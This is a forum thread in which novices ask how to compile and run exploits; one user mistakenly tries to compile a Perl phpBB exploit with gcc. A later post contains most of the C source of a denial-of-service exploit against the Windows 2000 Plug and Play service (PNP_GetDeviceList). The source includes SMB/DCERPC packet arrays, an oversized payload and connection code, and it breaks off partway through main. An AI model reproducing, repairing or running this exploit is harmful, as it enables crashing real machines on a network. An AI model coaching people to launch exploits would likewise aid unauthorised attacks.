compilation

MrLovaLova

User
Joined
June 30, 2005
Posts
7
Hello,
could someone explain, or give me a link explaining, what compiling and/or fixing an exploit involves?
I was just compiling this:

root@server:~# gcc phpbb2_0_15.pl.c -o phpbb
phpbb2_0_15.pl.c:1:2: invalid preprocessing directive #!
phpbb2_0_15.pl.c:2:3: invalid preprocessing directive #Wed
phpbb2_0_15.pl.c:4:3: invalid preprocessing directive #phpBB
phpbb2_0_15.pl.c:5:3: invalid preprocessing directive #The
phpbb2_0_15.pl.c:6:3: invalid preprocessing directive #Book
phpbb2_0_15.pl.c:7:3: invalid preprocessing directive #or
phpbb2_0_15.pl.c:9:3: invalid preprocessing directive #BLINK
phpbb2_0_15.pl.c:12:3: invalid preprocessing directive #Example
phpbb2_0_15.pl.c:13:3: invalid preprocessing directive #You
phpbb2_0_15.pl.c:14:3: invalid preprocessing directive #Tested
phpbb2_0_15.pl.c:16:3: invalid preprocessing directive #!
phpbb2_0_15.pl.c:21: error: parse error before "strict"
phpbb2_0_15.pl.c:21: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:22: error: parse error before "IO"
phpbb2_0_15.pl.c:24: error: parse error before '[' token
phpbb2_0_15.pl.c: In function `unless':
phpbb2_0_15.pl.c:24: error: `print' undeclared (first use in this function)
phpbb2_0_15.pl.c:24: error: (Each undeclared identifier is reported only once
phpbb2_0_15.pl.c:24: error: for each function it appears in.)
phpbb2_0_15.pl.c:24: error: parse error before string constant
phpbb2_0_15.pl.c: At top level:
phpbb2_0_15.pl.c:26: error: `m' undeclared here (not in a function)
phpbb2_0_15.pl.c:26: error: parse error before '!' token
phpbb2_0_15.pl.c:28: error: parse error before "unless"
phpbb2_0_15.pl.c:29: error: `$1' undeclared here (not in a function)
phpbb2_0_15.pl.c:29: error: parse error before "unless"
phpbb2_0_15.pl.c:30: warning: parameter names (without types) in function declaration
phpbb2_0_15.pl.c:30: error: function `my' is initialized like a variable
phpbb2_0_15.pl.c:30: error: `$2' undeclared here (not in a function)
phpbb2_0_15.pl.c:30: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:32: error: parse error before string constant
phpbb2_0_15.pl.c:38: warning: parameter names (without types) in function declaration
phpbb2_0_15.pl.c:38: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:39: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:40: error: parse error before '}' token
phpbb2_0_15.pl.c:44: error: syntax error before '{' token
phpbb2_0_15.pl.c:46: error: request for member `$_' in something not a structure or union
phpbb2_0_15.pl.c:46: error: parse error before string constant
phpbb2_0_15.pl.c:48: error: parse error before string constant
phpbb2_0_15.pl.c:49: error: `IO' undeclared here (not in a function)
phpbb2_0_15.pl.c:49: error: parse error before ':' token
phpbb2_0_15.pl.c:54: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:56: error: syntax error at '#' token
phpbb2_0_15.pl.c:56: error: syntax error at '#' token
phpbb2_0_15.pl.c:59: warning: data definition has no type or storage class
phpbb2_0_15.pl.c:60: error: parse error before '}' token

and it throws errors every single time ;(
and I have no idea anymore what's going on
thanks in advance
 

DJBOSS666

User
Joined
February 21, 2003
Posts
302
I think you don't compile this exploit, you just save it to a file exploit.pl and run ./exploit.pl
but that's only my guess.

Regards

DJBOSS666
 

MrLovaLova

User
Joined
June 30, 2005
Posts
7
could you expand on that?
what does fixing the errors involve, because I don't really get it

I'd be grateful
 

DJBOSS666

User
Joined
February 21, 2003
Posts
302
Exploits are often tailored to a particular distribution (I think), and besides, it sometimes (quite often) happens that exploit authors deliberately put simple mistakes into the exploit code so as not to breed script kiddies (I hope I spelled that right), so all that's left is to learn C
or to look for a version of the exploit without the errors.

Regards

DJBOSS666
 

WalgO

User
Joined
June 11, 2004
Posts
495
You often have to enter values adjusted to your own needs, some IP numbers, site addresses etc., or it's ordinary errors like DJBOSS writes, e.g. syntax error, meaning an error in the syntax. Search the net and see what each error means and it will be easier for you 8)
 

Riddick1

User
Joined
December 18, 2005
Posts
49
Originally posted by DJBOSS666
I think you don't compile this exploit, you just save it to a file exploit.pl and run ./exploit.pl
but that's only my guess.

Regards

DJBOSS666


I know this was surely posted somewhere, but I can't find it. How do you run an exploit?
 

Riddick1

User
Joined
December 18, 2005
Posts
49
Originally posted by bobikrk
Quote:
I know this was surely posted somewhere, but I can't find it. How do you run an exploit?

Those are the basics, it's very simple...


I know it's the basics, but I'm only just starting with this and I'd ask you for help; could you tell me how to run an exploit, or give a link to a page where it's explained?
 

ktostam

User
Joined
September 15, 2005
Posts
50
Could someone compile this?? I'm on a modem and can't download the compilers


Code:
/* Program: Denial of Service attack for MS UMPNPMGR PNP_GetDeviceList
 * Author: Winny Thomas
 * Vulnerability: no length checking on passed parameter to
 * PNP_GetDeviceList in UMPNPMGR.dll
 * Note: The code crashes services.exe on the target, effectively
 * bringing down the target against which its run.
 * This code is for educational/testing purposes by authorized persons
 * on networks systems setup for such purposes.
 * The author shall bear no responsibility for any damage caused by
 * using this code.
 */

#include <stdio.h>
#include <stdlib.h>      /* exit(); missing from the posted copy */
#include <string.h>      /* strlen(), memcpy(); missing from the posted copy */
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/socket.h>

/* NetBIOS-framed SMB Negotiate Protocol request (dialect list). */
char SMB_Negotiate[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";

/* Session Setup AndX, first leg (NTLMSSP NEGOTIATE). */
char SMB_Session_setup_ANDX1[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";

/* Session Setup AndX, second leg (NTLMSSP AUTH, anonymous). */
char SMB_Session_setup_ANDX2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";

/* Tree Connect AndX header; the UNC path and service name are appended
 * at run time by setup_tCon(). */
char SMB_TreeConnect_ANDX[] =
"\x00\x00\x00\x58\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2D\x00\x00";

/* NT Create AndX opening the \browser named pipe. */
char SMB_NTCreate_ANDX_Request[] =
"\x00\x00\x00\x66\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe"
"\x00\x08\x40\x00\x18\xff\x00\xde\xde\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5c\x00\x62\x00\x72\x00\x6f\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";

/* SMB TransactNmPipe carrying a DCERPC bind to the PNP interface. */
char DCERPC_Bind_RPC_Service[] =
"\x00\x00\x00\x9A\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x08\x01\xC0"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x01\x00\x10\x00\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x48\x00\x52\x00\x02"
"\x00\x26\x00\x00\x40\x57\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00"
"\x00\x00\x00\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11\x8F\x69"
"\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C"
"\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";

/* DCERPC request for PNP_GetDeviceList with an oversized device-ID string
 * (a long run of "\" characters in UTF-16LE). */
char PNP_GetDeviceList_Request[] =
"\x00\x00\x08\x84\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x80\x01\x10\x00\x00\x30\x08\x00\x00\x00\x10\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x30\x08\x54\x00\x02"
"\x00\x26\x00\x00\x40\x41\x08\xa2\x5c\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00\x00\x03\x10\x00\x00\x00"
"\x30\x08\x00\x00\x01\x00\x00\x00\x18\x08\x00\x00\x00\x00\x0a\x00"
"\x44\xf7\x12\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00"
"\x48\x00\x54\x00\x52\x00\x45\x00\x45\x00\x5c\x00\x52\x00\x4f\x00"
"\x4f\x00\x54\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00\x5c\x00"
"\x5c\x00\x00\x00\x00\x08\x00\x00\x01\x00\x00\x00";

/* Append the UNC path (as UTF-16LE) and the ASCII service name "IPC"
 * after the fixed Tree Connect AndX header at ptr. Declared "char *" in
 * the posted copy although it returns nothing; made void here. */
void setup_tCon(char *UNC, char *ptr)
{
    int pindex = 0, uindex = 0, len;

    len = strlen(UNC);
    while (uindex < len) {
        if ((pindex % 2) != 0) {
            ptr[pindex] = '\x00';
            pindex++;
            continue;
        }

        ptr[pindex] = UNC[uindex];
        uindex++;
        pindex++;
    }

    ptr[pindex] = '\x00';
    pindex++;
    ptr[pindex] = '\x00';
    pindex++;
    ptr[pindex] = '\x00';
    pindex++;
    ptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++;
    ptr[pindex] = 'C'; pindex++;
    ptr[pindex] = '\x00';
    pindex++;
    ptr[pindex] = '\x00';
    pindex++;
}

int main(int argc, char *argv[])
{
    struct sockaddr_in target;
    struct hostent *host;
    int sock;
    char response[4096];
    char UNC[50], tConXpacket[150], *temp;
    char targetIP[20];
    int nread, ret, templen;

    if (argc < 2) {
        printf("Usage: upnp_getdevicelist_DOS <host name|ip address>\n");
        exit(-1);
    }

    printf("\n==========================================\n");
    printf("WIN2K UPNP interface DOS Attack\n");
    printf("Coded by Winny Thomas\n");
    printf("==========================================\n\n");

    printf("[*] Resolving %s: ", argv[1]);
    host = gethostbyname(argv[1]);
    if (host == NULL) {
        printf("\033[0;31mFailed\033[0;39m\n");
        exit(-1);
    }
    printf("\033[0;32mOK\033[0;39m\n");

    target.sin_family = AF_INET;
    target.sin_addr = *(struct in_addr *)host->h_addr;
    target.sin_port = htons(445);

    sprintf(targetIP, "%s", inet_ntoa(target.sin_addr));
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if ((ret = connect(sock, (struct sockaddr *)&target,
                       sizeof(struct sockaddr))) < 0) {
        perror("Connect");
        exit(-1);
    }

    printf("[*] SMB Negotiation with %s: ", argv[1]);
    if ((send(sock, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0)) < 0) {
        perror("SMB Negotiate");
        exit(-1);
    }
    ret = recv(sock, response, 4096, 0);
    if ((ret < 10 || response[9] != 0)) {
        printf("\033[0;31mFailed\033[0;39m\n");
        exit(-1);
    }
    printf("\033[0;32mOK\033[0;39m\n");

    printf("[*] SMB Session setup ANDX 1 with %s: ", argv[1]);
    if ((send(sock, SMB_Session_setup_ANDX1,
              sizeof(SMB_Session_setup_ANDX1)-1, 0)) < 0) {
        perror("SMB_Session_setup_ANDX1");
        exit(-1);
    }
    ret = recv(sock, response, 4096, 0);
    if (ret <= 10) {
